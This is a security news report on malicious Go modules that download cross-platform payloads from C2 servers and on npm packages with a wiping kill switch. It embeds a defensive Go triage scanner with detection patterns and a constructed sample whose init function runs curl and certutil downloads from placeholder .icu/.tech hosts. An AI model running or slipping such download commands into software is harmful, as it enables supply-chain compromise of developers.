Malicious Go, npm Packages Deliver Cross-Platform Malware, Trigger Remote Data Wipes

08.08.2025

Cybersecurity researchers have identified 11 malicious Go packages that target both Windows and Linux systems by downloading and executing additional payloads from remote servers. Upon execution, the code silently spawns a shell, retrieves second-stage payloads from .icu and .tech C2 servers, and runs them in memory. These payloads can collect system information, access browser data, and communicate with their C2 servers.

The packages use obfuscated loaders to deliver ELF (for Linux) and PE (for Windows) binaries. On Linux the payload is fetched by a bash script, while on Windows certutil.exe is used to download the executables, so development environments on both platforms are exposed. The decentralized nature of Go's module system, which allows imports directly from GitHub, increases the risk, as attackers mimic trustworthy module names to trick developers.
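The behaviours described above (shelling out from an init path, certutil-based downloads, and C2 hosts on .icu/.tech domains) lend themselves to a quick static triage of a module before it is built. The following Go program is an added example, not code from the report or from the affected packages; the rule names, the sample "trojanized" source text and the host names in it are constructed for illustration, and the rules are heuristics for review, not signatures.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one triage hit: the rule that fired, the line number and its text.
type Finding struct {
	Rule string
	Line int
	Text string
}

// rules encode the reported behaviours: spawning a shell, certutil downloads,
// and URLs on .icu/.tech hosts. Heuristic only; a hit means "review this file".
var rules = []struct {
	name string
	re   *regexp.Regexp
}{
	{"exec-shell", regexp.MustCompile(`exec\.Command\(\s*"(?:/bin/)?(?:sh|bash|cmd(?:\.exe)?)"`)},
	{"certutil-download", regexp.MustCompile(`(?i)certutil(?:\.exe)?\b[^\n]*-urlcache`)},
	{"suspicious-tld-url", regexp.MustCompile(`https?://[A-Za-z0-9.-]+\.(?:icu|tech)\b`)},
}

// Scan runs every rule over each line of a Go source file and returns the hits
// in file order (several rules may fire on the same line).
func Scan(src string) []Finding {
	var out []Finding
	for i, line := range strings.Split(src, "\n") {
		for _, r := range rules {
			if r.re.MatchString(line) {
				out = append(out, Finding{r.name, i + 1, strings.TrimSpace(line)})
			}
		}
	}
	return out
}

// sample is a constructed stand-in for a trojanized module, shaped after the
// report's description; it is not code from the real packages.
const sample = `package helper
import "os/exec"
func init() {
	// constructed downloader stub
	exec.Command("/bin/sh", "-c", "curl -fsSL http://update.example.icu/s").Run()
	exec.Command("cmd.exe", "/c", "certutil.exe -urlcache -split -f http://cdn.example.tech/a.exe").Run()
}`

func main() {
	for _, f := range Scan(sample) {
		fmt.Printf("%-18s line %d: %s\n", f.Rule, f.Line, f.Text)
	}
}
```

In practice, run Scan over every .go file of a freshly pulled dependency (for example from the module cache) and route any hit to a human reviewer rather than blocking automatically, since legitimate tooling also shells out.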

Researchers believe these packages were created by a single threat actor due to shared code patterns and C2 infrastructure. This highlights the ongoing supply chain risks in the Go ecosystem, where cross-platform compatibility can be exploited for malware delivery.

In parallel, two malicious npm packages, naya-flore and nvlore-hsc, were discovered masquerading as WhatsApp socket libraries. Both contain a kill switch that wipes systems not linked to Indonesian phone numbers, and both attempt to exfiltrate data. One package even contains a hardcoded GitHub token, suggesting possible future misuse. These incidents underline the growing threat of malware distribution through open-source repositories.